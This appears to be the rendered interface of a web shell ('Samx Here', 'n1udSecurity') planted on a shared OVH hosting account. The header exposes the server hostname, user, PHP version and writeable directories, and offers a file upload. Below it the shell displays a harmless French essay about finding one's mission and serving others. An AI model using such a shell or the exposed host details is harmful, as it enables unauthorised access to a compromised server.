Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/dieu/Audio/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/dieu/Audio/2016-11-30PartirEnMissionFull.txt
Partir en mission c'est découvrir des vérités, se satisfaire de donner du bonheur aux autres pour s'émerveiller du sourire d'un travail humain, à savoir apprendre à aimer la société et les autres, cette nature surtout.
Nous étions tous agriculteurs avant et avons appris aux seigneurs, ces personnalités prenant des risques par notre parole, paroles devenus écrits par les scribes voulant comprendre, les écrivains publics ou vidéastes amateurs improvisant par la théorie du puis des mouvements vers la perfection naturelle ou scientifique, ou bien la théorie du secret permettant de défier face à face ou par l'improvisation. Puis des écrits créatifs nous amènent à une cause qui a ou aura de fortes chances de devenir un destin, c'est à dire ce qui nous fera par notre accomplissement, c'est à dire la découverte de ce qui fait cette cause en nous par la diffusion dans la ou cette société qui se transforme, principe élémentaire de l'économie.
Les robots nécessitent de connaître la nature de la société et son mouvement, cette vie qui croît en nous et avec nous. Nous disons alors évidemment qu'il faut préserver ces acquis. Si nous connaissons cette imperfection, nous voulons la transformer pour l'améliorer. Il faut cependant connaître donc s'initier à cette organisation de la matière et de la société allant vers la perfection.
On devient un économiste de la société ensuite. Partir vers sa mission c'est quelque chose qui nous pousse à parcourir un chemin vers l'inconnu, poussé par sa recherche de vérité. Il s'agit de savoir pourquoi on est sur Terre. Est-on sur Terre pour cumuler des biens matériels ? Ou est-on sur Terre pour les autres afin de s'enrichir soi ? 
Il s'agit d'agir en fonction de ses origines et de son nom pour avancer dans la découverte de sa famille et d'un destin donc d'un avenir à créer. On trace cet avenir quand on n'est pas détourné par l'emploi qui devrait être un travail servant réellement aux autres. Si son travail sert aux autres, alors notre recherche de vérité reprend. Notre bonheur vient. 
La mission permet de connaître la société et son environnement naturel pour y participer, afin de s'épanouir de son utilité. Alors, les autres nous voient sous notre meilleure facette. Alors, les conseils donnés servent pour la vie. Certaines missions, celles que nous voulons réaliser, ont plus de mérite car nous utilisons notre passion pour nous transformer.

Mes Notes

Écrivez sur vos origines et votre avenir.


SAMX